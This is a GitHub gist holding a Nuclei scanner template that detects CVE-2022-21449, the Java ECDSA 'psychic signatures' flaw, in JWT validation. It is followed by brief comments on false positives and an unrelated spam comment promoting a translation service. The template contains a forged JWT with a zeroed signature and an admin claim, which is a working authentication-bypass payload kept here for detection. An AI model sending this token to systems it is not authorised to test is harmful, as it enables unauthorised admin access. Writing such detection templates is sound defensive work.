Skip to content

Instantly share code, notes, and snippets.

@righettod
Last active December 18, 2023 06:50
Show Gist options
  • Save righettod/1d2f4498e3dba4fc779036ce83565d68 to your computer and use it in GitHub Desktop.
Save righettod/1d2f4498e3dba4fc779036ce83565d68 to your computer and use it in GitHub Desktop.
Nuclei template to detect exposure to CVE-2022-21449 by the JWT validation API in place.
id: CVE-2022-21449
info:
name: CVE-2022-21449 test exposure
description: The JDK 15-18 have a vulnerability in validation of ECDSA signature so this template detect exposure to CVE-2022-21449 by the JWT validation API in place.
author: righettod
severity: info
tags: cve,2022,java
reference: https://neilmadden.blog/2022/04/19/psychic-signatures-in-java
requests:
- raw:
- |
GET /?id={{randstr}} HTTP/1.1
Host: {{Hostname}}
Cache-Control: no-store
- |
GET /?id={{randstr}} HTTP/1.1
Host: {{Hostname}}
Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJFUzI1NiJ9.eyJzdWIiOiJSaWNrIEFzdGxleSIsImFkbWluIjp0cnVlLCJpYXQiOjE2NTA0NjY1MDIsImV4cCI6MTkwMDQ3MDEwMn0.MAYCAQACAQA
Cache-Control: no-store
req-condition: true
matchers:
- type: dsl
dsl:
- '(status_code_1 == 403 || status_code_1 == 401) && status_code_2 == 200'
@daffainfo
Copy link

Need to add some matcher, if not, there will be many false positives

@righettod
Copy link
Author

Yes, you have 100% right. It was a first proposal and I will refactor it to decrease the probability of false-positive.

@righettod
Copy link
Author

@daffainfo I updated the template to try decreasing the probability of false-positive:

image

@daffainfo
Copy link

looks so much better

@righettod
Copy link
Author

Thank you.

@LauraSanders022
Copy link

LauraSanders022 commented Jan 12, 2023

I am looking for the Nuclei template to detect exposure to CVE-2022-21449 by the JWT validation API in place and I am glad I found your post. I was searching for the translation service online and found this https://pickwriters.com/spanish-translation-services link as well as I found link to your post on google search and it saved my a lot of time in searching for your post.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment